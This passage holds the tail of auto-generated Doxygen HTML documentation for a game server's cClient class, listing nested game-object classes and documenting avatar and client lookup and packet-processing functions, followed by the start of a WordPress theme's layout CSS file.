class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a487f7158d3f8ae977b4d039ac42828b2">cWorldManager</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad717a9060379dea4fe5fa2304b88d24a"></a><!-- doxytag: member="cClient::cCommandParser" ref="ad717a9060379dea4fe5fa2304b88d24a" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ad717a9060379dea4fe5fa2304b88d24a">cCommandParser</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5b96d7121a3e53dd53de56e8b4ab66dc"></a><!-- doxytag: member="cClient::cAllegiance" ref="a5b96d7121a3e53dd53de56e8b4ab66dc" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a5b96d7121a3e53dd53de56e8b4ab66dc">cAllegiance</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a232598bce424bad0f22df0ea306f7b1f"></a><!-- doxytag: member="cClient::cFellowship" ref="a232598bce424bad0f22df0ea306f7b1f" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a232598bce424bad0f22df0ea306f7b1f">cFellowship</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8f905d70e0c88f790fbde336b1c79354"></a><!-- doxytag: member="cClient::cNPC" ref="a8f905d70e0c88f790fbde336b1c79354" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a8f905d70e0c88f790fbde336b1c79354">cNPC</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a59c8fcb5fdcc5b6580c9f7c693278204"></a><!-- doxytag: member="cClient::cAltar" ref="a59c8fcb5fdcc5b6580c9f7c693278204" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a59c8fcb5fdcc5b6580c9f7c693278204">cAltar</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a57494e8bf15408dfc91168a129d23046"></a><!-- doxytag: member="cClient::cDoor" ref="a57494e8bf15408dfc91168a129d23046" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a57494e8bf15408dfc91168a129d23046">cDoor</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4bcd24b9700e30e357a9bf52077a6154"></a><!-- doxytag: member="cClient::cChest" ref="a4bcd24b9700e30e357a9bf52077a6154" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a4bcd24b9700e30e357a9bf52077a6154">cChest</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="acbf9967e1acd5a1b5859577d249ed975"></a><!-- doxytag: member="cClient::cLifestone" ref="acbf9967e1acd5a1b5859577d249ed975" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#acbf9967e1acd5a1b5859577d249ed975">cLifestone</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab7cdd27a49602021a1bb3be022bffbe5"></a><!-- doxytag: member="cClient::cWeapon" ref="ab7cdd27a49602021a1bb3be022bffbe5" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ab7cdd27a49602021a1bb3be022bffbe5">cWeapon</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8b7895bb654c623ba63165d19345d6d9"></a><!-- doxytag: member="cClient::cAbiotic" ref="a8b7895bb654c623ba63165d19345d6d9" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a8b7895bb654c623ba63165d19345d6d9">cAbiotic</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a384058d451816a1e7a390a0a253d68d0"></a><!-- doxytag: member="cClient::cPortal" ref="a384058d451816a1e7a390a0a253d68d0" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a384058d451816a1e7a390a0a253d68d0">cPortal</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aea51ac038aaac4dab43824e0aa0c34e9"></a><!-- doxytag: member="cClient::cArmor" ref="aea51ac038aaac4dab43824e0aa0c34e9" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#aea51ac038aaac4dab43824e0aa0c34e9">cArmor</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aec85228d92ef84d6ee563085bcba352e"></a><!-- doxytag: member="cClient::cCovenant" ref="aec85228d92ef84d6ee563085bcba352e" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#aec85228d92ef84d6ee563085bcba352e">cCovenant</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a62edb84a6d59969526a00cc2484125a3"></a><!-- doxytag: member="cClient::cHouse" ref="a62edb84a6d59969526a00cc2484125a3" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a62edb84a6d59969526a00cc2484125a3">cHouse</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a1f9cea5d6048112856b71c40f1b7cb2c"></a><!-- doxytag: member="cClient::cHooks" ref="a1f9cea5d6048112856b71c40f1b7cb2c" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a1f9cea5d6048112856b71c40f1b7cb2c">cHooks</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3b3a64fd40230616686e33a11c205c5d"></a><!-- doxytag: member="cClient::cStorage" ref="a3b3a64fd40230616686e33a11c205c5d" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a3b3a64fd40230616686e33a11c205c5d">cStorage</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad50abea5da456ec590dbd8471da89715"></a><!-- doxytag: member="cClient::cMonster" ref="ad50abea5da456ec590dbd8471da89715" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ad50abea5da456ec590dbd8471da89715">cMonster</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af01c1cd3af15af4c613607ea8c6412bd"></a><!-- doxytag: member="cClient::cMonsterServer" ref="af01c1cd3af15af4c613607ea8c6412bd" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>cMonsterServer</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a2f1e5d0432ca9dc331362760416b2b20"></a><!-- doxytag: member="cClient::cObject" ref="a2f1e5d0432ca9dc331362760416b2b20" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a2f1e5d0432ca9dc331362760416b2b20">cObject</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a293c07d9c5518afd6dc4280a470014bf"></a><!-- doxytag: member="cClient::cAvatar" ref="a293c07d9c5518afd6dc4280a470014bf" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a293c07d9c5518afd6dc4280a470014bf">cAvatar</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a2e7db0056868e295369225f0790193f0"></a><!-- doxytag: member="cClient::cPets" ref="a2e7db0056868e295369225f0790193f0" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>cPets</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa9dbcd0d7cc1ea1e7bfc91148f6ca8c8"></a><!-- doxytag: member="cClient::cCorpse" ref="aa9dbcd0d7cc1ea1e7bfc91148f6ca8c8" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#aa9dbcd0d7cc1ea1e7bfc91148f6ca8c8">cCorpse</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a2c22d7fb45d13400b84768acbeac9b81"></a><!-- doxytag: member="cClient::cWorldObject" ref="a2c22d7fb45d13400b84768acbeac9b81" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a2c22d7fb45d13400b84768acbeac9b81">cWorldObject</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5b02e396869b47a81ec3c52800e82059"></a><!-- doxytag: member="cClient::cFood" ref="a5b02e396869b47a81ec3c52800e82059" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a5b02e396869b47a81ec3c52800e82059">cFood</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae3985ad390292104ab0f4ff441e5800e"></a><!-- doxytag: member="cClient::cFoodContainer" ref="ae3985ad390292104ab0f4ff441e5800e" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>cFoodContainer</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab517ad720b0a84929b5c4fa5abab33f8"></a><!-- doxytag: member="cClient::cMerchantSign" ref="ab517ad720b0a84929b5c4fa5abab33f8" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ab517ad720b0a84929b5c4fa5abab33f8">cMerchantSign</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac89b56db2669f761cb436336860254cb"></a><!-- doxytag: member="cClient::cScrolls" ref="ac89b56db2669f761cb436336860254cb" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ac89b56db2669f761cb436336860254cb">cScrolls</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac0564202ead18b039b7ae7e3d936d24d"></a><!-- doxytag: member="cClient::cHealingKits" ref="ac0564202ead18b039b7ae7e3d936d24d" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ac0564202ead18b039b7ae7e3d936d24d">cHealingKits</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab4afb49db812ebbf5385cf76cc2a5a92"></a><!-- doxytag: member="cClient::cGems" ref="ab4afb49db812ebbf5385cf76cc2a5a92" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ab4afb49db812ebbf5385cf76cc2a5a92">cGems</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a30d0744559165d098cb3da710c7de97b"></a><!-- doxytag: member="cClient::cBooks" ref="a30d0744559165d098cb3da710c7de97b" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a30d0744559165d098cb3da710c7de97b">cBooks</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a1a6750ddd03f12ceee8cf2dca40583d9"></a><!-- doxytag: member="cClient::cManaStones" ref="a1a6750ddd03f12ceee8cf2dca40583d9" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a1a6750ddd03f12ceee8cf2dca40583d9">cManaStones</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4039ffa7bfc296eab4a4786c55cd1245"></a><!-- doxytag: member="cClient::cLockpicks" ref="a4039ffa7bfc296eab4a4786c55cd1245" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a4039ffa7bfc296eab4a4786c55cd1245">cLockpicks</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af68a7e414a1f881335af75dbe45ed497"></a><!-- doxytag: member="cClient::cWands" ref="af68a7e414a1f881335af75dbe45ed497" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#af68a7e414a1f881335af75dbe45ed497">cWands</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a2da6398e533020a0f5d9799633987515"></a><!-- doxytag: member="cClient::cTradeSkillMats" ref="a2da6398e533020a0f5d9799633987515" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a2da6398e533020a0f5d9799633987515">cTradeSkillMats</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a57c3e0b2066aa1b1fec6f1503be2d722"></a><!-- doxytag: member="cClient::cSpellComps" ref="a57c3e0b2066aa1b1fec6f1503be2d722" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a57c3e0b2066aa1b1fec6f1503be2d722">cSpellComps</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="afc62701f5027cc0c3806548ffcc41e0b"></a><!-- doxytag: member="cClient::cAmmo" ref="afc62701f5027cc0c3806548ffcc41e0b" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#afc62701f5027cc0c3806548ffcc41e0b">cAmmo</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a759f6277c695fac27d8034e81b65e06b"></a><!-- doxytag: member="cClient::cSalvage" ref="a759f6277c695fac27d8034e81b65e06b" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a759f6277c695fac27d8034e81b65e06b">cSalvage</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4f44b739bd7e62b416fcdd2b4488499e"></a><!-- doxytag: member="cClient::cPyreals" ref="a4f44b739bd7e62b416fcdd2b4488499e" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a4f44b739bd7e62b416fcdd2b4488499e">cPyreals</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac9309162cb930ae2dcb91d2fed2843dc"></a><!-- doxytag: member="cClient::cJewelry" ref="ac9309162cb930ae2dcb91d2fed2843dc" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ac9309162cb930ae2dcb91d2fed2843dc">cJewelry</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a647c5c4f923bfd608e8f853cd1f7008a"></a><!-- doxytag: member="cClient::cHealingCon" ref="a647c5c4f923bfd608e8f853cd1f7008a" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a647c5c4f923bfd608e8f853cd1f7008a">cHealingCon</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab3d8c7325c3f0a19c9cf443bd64dba4b"></a><!-- doxytag: member="cClient::cWandCon" ref="ab3d8c7325c3f0a19c9cf443bd64dba4b" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>cWandCon</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a63dd629016d3c3297d1690d967e0e2f3"></a><!-- doxytag: member="cClient::cCompCon" ref="a63dd629016d3c3297d1690d967e0e2f3" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>cCompCon</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae6b2852676434599292490ef57851c75"></a><!-- doxytag: member="cClient::cTradeNotes" ref="ae6b2852676434599292490ef57851c75" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ae6b2852676434599292490ef57851c75">cTradeNotes</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5a80bbbf499bb86d80eab8f82db271b4"></a><!-- doxytag: member="cClient::cPlants" ref="a5a80bbbf499bb86d80eab8f82db271b4" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a5a80bbbf499bb86d80eab8f82db271b4">cPlants</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a6e8bbf4a08a82a6ab34b379aca1b8483"></a><!-- doxytag: member="cClient::cClothes" ref="a6e8bbf4a08a82a6ab34b379aca1b8483" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a6e8bbf4a08a82a6ab34b379aca1b8483">cClothes</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="abd8ed2e9443218c9af2f7fd70ca9c9e1"></a><!-- doxytag: member="cClient::cPack" ref="abd8ed2e9443218c9af2f7fd70ca9c9e1" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#abd8ed2e9443218c9af2f7fd70ca9c9e1">cPack</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac5262f2780c5b28aafa7728ee5d03801"></a><!-- doxytag: member="cClient::cShield" ref="ac5262f2780c5b28aafa7728ee5d03801" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ac5262f2780c5b28aafa7728ee5d03801">cShield</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a503780ff39cf1adc2d42f4fd8db15117"></a><!-- doxytag: member="cClient::cFoci" ref="a503780ff39cf1adc2d42f4fd8db15117" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a503780ff39cf1adc2d42f4fd8db15117">cFoci</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab69023b142ed5672959fca164c155eef"></a><!-- doxytag: member="cClient::TreasureGen" ref="ab69023b142ed5672959fca164c155eef" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#ab69023b142ed5672959fca164c155eef">TreasureGen</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a079526bf3ff6fe548fb09c03143edf1b"></a><!-- doxytag: member="cClient::cMisc" ref="a079526bf3ff6fe548fb09c03143edf1b" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a079526bf3ff6fe548fb09c03143edf1b">cMisc</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a1d0cb762381184041399a833145f67f9"></a><!-- doxytag: member="cClient::cWarSpell" ref="a1d0cb762381184041399a833145f67f9" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a1d0cb762381184041399a833145f67f9">cWarSpell</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="abb4e3bf0f0a0e65ec5f7a2776d264707"></a><!-- doxytag: member="cClient::SimpleAI" ref="abb4e3bf0f0a0e65ec5f7a2776d264707" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>SimpleAI</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="acb0fbc6fd119c6e835c3353e62c5d17c"></a><!-- doxytag: member="cClient::cEnchantment" ref="acb0fbc6fd119c6e835c3353e62c5d17c" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><b>cEnchantment</b></td></tr> </table> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="a06daa279d4743c118a1500c854cf211d"></a><!-- doxytag: member="cClient::FindAvatar" ref="a06daa279d4743c118a1500c854cf211d" args="(char *szName)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="classc_avatar.html">cAvatar</a> * cClient::FindAvatar </td> <td>(</td> <td class="paramtype">char *&nbsp;</td> <td class="paramname"> <em>szName</em></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Finds an avatar.</p> <p>This function is called when a particular avatar needs to be found. The search is performed by searching for the client's avatar's name.</p> <dl><dt><b>Parameters:</b></dt><dd> <table border="0" cellspacing="2" cellpadding="0"> <tr><td valign="top"></td><td valign="top"><em>szName</em>&nbsp;</td><td>- The client's avatar's name.</td></tr> </table> </dd> </dl> <dl class="return"><dt><b>Returns:</b></dt><dd>*cAvatar - A pointer to the avatar. </dd></dl> </div> </div> <a class="anchor" id="a622b0587d13187373ee48b6e5a115822"></a><!-- doxytag: member="cClient::FindAvatar" ref="a622b0587d13187373ee48b6e5a115822" args="(DWORD dwGUID)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="classc_avatar.html">cAvatar</a> * cClient::FindAvatar </td> <td>(</td> <td class="paramtype">DWORD&nbsp;</td> <td class="paramname"> <em>dwGUID</em></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Finds an avatar.</p> <p>This function is called when a particular avatar needs to be found. The search is performed by searching for the client's avatar's GUID.</p> <dl><dt><b>Parameters:</b></dt><dd> <table border="0" cellspacing="2" cellpadding="0"> <tr><td valign="top"></td><td valign="top"><em>dwGUID</em>&nbsp;</td><td>- The client's avatar's GUID.</td></tr> </table> </dd> </dl> <dl class="return"><dt><b>Returns:</b></dt><dd>*cAvatar - A pointer to the avatar. </dd></dl> </div> </div> <a class="anchor" id="af8556c7252fc308de7109f1e49342281"></a><!-- doxytag: member="cClient::FindClient" ref="af8556c7252fc308de7109f1e49342281" args="(char *szName)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="classc_client.html">cClient</a> * cClient::FindClient </td> <td>(</td> <td class="paramtype">char *&nbsp;</td> <td class="paramname"> <em>szName</em></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Finds a client.</p> <p>This function is called when a particular client needs to be found. The search is performed by searching for the client's avatar's name.</p> <dl><dt><b>Parameters:</b></dt><dd> <table border="0" cellspacing="2" cellpadding="0"> <tr><td valign="top"></td><td valign="top"><em>szName</em>&nbsp;</td><td>- The client's avatar's name.</td></tr> </table> </dd> </dl> <dl class="return"><dt><b>Returns:</b></dt><dd>*cClient - A pointer to the client. </dd></dl> </div> </div> <a class="anchor" id="aed2ee9f88a8c9c8b9e48d54d833d2f27"></a><!-- doxytag: member="cClient::FindClient" ref="aed2ee9f88a8c9c8b9e48d54d833d2f27" args="(DWORD dwGUID)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="classc_client.html">cClient</a> * cClient::FindClient </td> <td>(</td> <td class="paramtype">DWORD&nbsp;</td> <td class="paramname"> <em>dwGUID</em></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Finds a client.</p> <p>This function is called when a particular client needs to be found. The search is performed by searching for the client's avatar's GUID.</p> <dl><dt><b>Parameters:</b></dt><dd> <table border="0" cellspacing="2" cellpadding="0"> <tr><td valign="top"></td><td valign="top"><em>dwGUID</em>&nbsp;</td><td>- The client's avatar's GUID.</td></tr> </table> </dd> </dl> <dl class="return"><dt><b>Returns:</b></dt><dd>*cClient - A pointer to the client. </dd></dl> </div> </div> <a class="anchor" id="a62aa722cb32b806fdcc823356254b4d7"></a><!-- doxytag: member="cClient::Hash_Erase" ref="a62aa722cb32b806fdcc823356254b4d7" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void cClient::Hash_Erase </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Erases all clients from the client hash list. </p> </div> </div> <a class="anchor" id="af6f48be3b5024ce9b346fcd93079aea9"></a><!-- doxytag: member="cClient::Hash_Remove" ref="af6f48be3b5024ce9b346fcd93079aea9" args="(cClient *pcClient)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void cClient::Hash_Remove </td> <td>(</td> <td class="paramtype"><a class="el" href="classc_client.html">cClient</a> *&nbsp;</td> <td class="paramname"> <em>pcClient</em></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p>Removes a client from the client hash list.</p> <p>This function is called when a client disconnects from the server.</p> <dl><dt><b>Parameters:</b></dt><dd> <table border="0" cellspacing="2" cellpadding="0"> <tr><td valign="top"></td><td valign="top"><em>*pcClient</em>&nbsp;</td><td>- A pointer to the client to be removed. </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="af8cfc53e46270debb3a903643c3a6d59"></a><!-- doxytag: member="cClient::ProcessPacket_CS" ref="af8cfc53e46270debb3a903643c3a6d59" args="(cRecvPacket *pcRecvPacket)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void cClient::ProcessPacket_CS </td> <td>(</td> <td class="paramtype"><a class="el" href="classc_recv_packet.html">cRecvPacket</a> *&nbsp;</td> <td class="paramname"> <em>pcRecvPacket</em></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>Processes Character Server packets</p> <p>This function is called when the client sends a general Character Server message. These encompass the actions performed by a client when outside of the server game world. </p> </div> </div> <a class="anchor" id="a90c94eb1a59cf65ff87de321a687347a"></a><!-- doxytag: member="cClient::ProcessPacket_WS" ref="a90c94eb1a59cf65ff87de321a687347a" args="(cRecvPacket *pcRecvPacket)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void cClient::ProcessPacket_WS </td> <td>(</td> <td class="paramtype"><a class="el" href="classc_recv_packet.html">cRecvPacket</a> *&nbsp;</td> <td class="paramname"> <em>pcRecvPacket</em></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>Processes World Server packets</p> <p>This function is called when the client sends a general World Server message. These encompass the actions performed by a client's avatar. </p> </div> </div> <hr/>The documentation for this class was generated from the following files:<ul> <li>E:/uas2/Server/<a class="el" href="_client_8h_source.html">Client.h</a></li> <li>E:/uas2/Server/<a class="el" href="_character_server_8cpp.html">CharacterServer.cpp</a></li> <li>E:/uas2/Server/Client.cpp</li> <li>E:/uas2/Server/<a class="el" href="_world_server_8cpp.html">WorldServer.cpp</a></li> </ul> </div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> </body> </html>
wp-content/themes/thesis_16/custom/layout.css
plorent/blog
/*---:[ core layout elements ]:---*/ #container { width: 111.3em; margin: 0 auto; } #page { padding: 2.2em; } #header, #footer { padding-right: 1.1em; padding-left: 1.1em; } #content_box { width: 100%; background: url('../lib/images/dot-ddd.gif') 63.3em 0 repeat-y; } .no_sidebars { background: none !important; } #content { width: 63.3em; float: left; } .no_sidebars #content { width: 100%; } .post_box, .teasers_box, .full_width #content_box .page { margin: 0 2.2em 0 1.1em; } .full_width #content_box .page { width: auto; } .no_sidebars .post_box { margin: 0 1.1em; } .teasers_box { width: 60em; } .teaser { width: 28.9em; } #archive_info, .prev_next { padding-right: 2.2em; padding-left: 1.1em; } #sidebars { width: 43.5em; border: 0; float: right; } #sidebar_1 { width: 21.7em; border-width: 0 0.1em 0 0; float: left; clear: left; } #sidebar_2 { width: 21.6em; float: left; } .sidebar ul.sidebar_list { padding-right: 1.1em; padding-left: 1.1em; } #sidebar_2 ul.sidebar_list { padding-right: 1em; } /*---:[ nav styles ]:---*/ .menu ul, .menu ul li { width: 15em; } .menu ul ul, .menu :hover ul :hover ul { left: 14.9em; } .menu li:hover ul, .menu a:hover ul { left: -0.1em; } .menu { border-width: 0 0 0.1em 0.1em; } /*---:[ multimedia box elements ]:---*/ #multimedia_box { padding: 1.1em; } #image_box img { display: block; padding: 0.1em; border-width: 0.1em; } #image_box img.square { width: 40.9em; height: 40.9em; } #image_box img.four_by_three { width: 40.9em; height: 30.7em; } #image_box img.three_by_four { width: 40.9em; height: 54.5em; } #image_box img.three_by_two { width: 40.9em; height: 27.3em; } #image_box img.two_by_three { width: 40.9em; height: 61.4em; } #image_box img.five_by_four { width: 40.9em; height: 32.7em; } #image_box img.four_by_five { width: 40.9em; height: 51.1em; } #image_box img.sixteen_by_nine { width: 40.9em; height: 23em; margin: 0 auto; } #image_box img.nine_by_sixteen { width: 40.9em; height: 72.7em; margin: 0 auto; } #image_box img.two_by_one { width: 40.9em; height: 20.5em; } #image_box img.one_by_two { width: 40.9em; height: 81.8em; } /*---:[ feature box styles ]:---*/ #feature_box { padding-right: 1.1em; padding-left: 1.1em; } /*---:[ comments area ]:---*/ #comments { margin-right: 2.2em; margin-left: 0em; } .comments_intro, #respond_intro { margin-left: 1.1em; } dl#comment_list dt, dl#trackback_list dt { padding-right: 1.1em; padding-left: 1.1em; } dl#comment_list dd, dl#trackback_list dd { padding-left: 1.1em; } dl#comment_list dd .format_text, dl#comment_list dd #respond { padding-right: 1.1em; } dl#comment_list dl dt { padding-left: 2.2em; border-width: 0 0 0 0.1em; } dl#comment_list dl dt.bypostauthor { padding-left: 2.1em; border-width: 0 0 0 0.2em; } dl#comment_list dl dd { padding-left: 0; } dl#comment_list dl dd .format_text { padding-left: 1.6em; border-width: 0 0 0 0.071em; } dl#comment_list dl dd.bypostauthor > .format_text { padding-left: 1.5em; border-width: 0 0 0 0.143em; } dl#comment_list dl dd dl { padding-left: 2.2em; } #commentform { padding-right: 2.2em; padding-left: 1.1em; } .comments_closed, .login_alert { margin-left: 1.1em; } /*---:[ content elements ]:---*/ body { font-family: Georgia, "Times New Roman", Times, serif; } #header { padding-top: 2.2em; padding-bottom: 2.2em; } .post_box { padding-top: 2.2em; } .headline_area { margin-bottom: 2.2em; } .teasers_box { padding-top: 2.2em; padding-bottom: 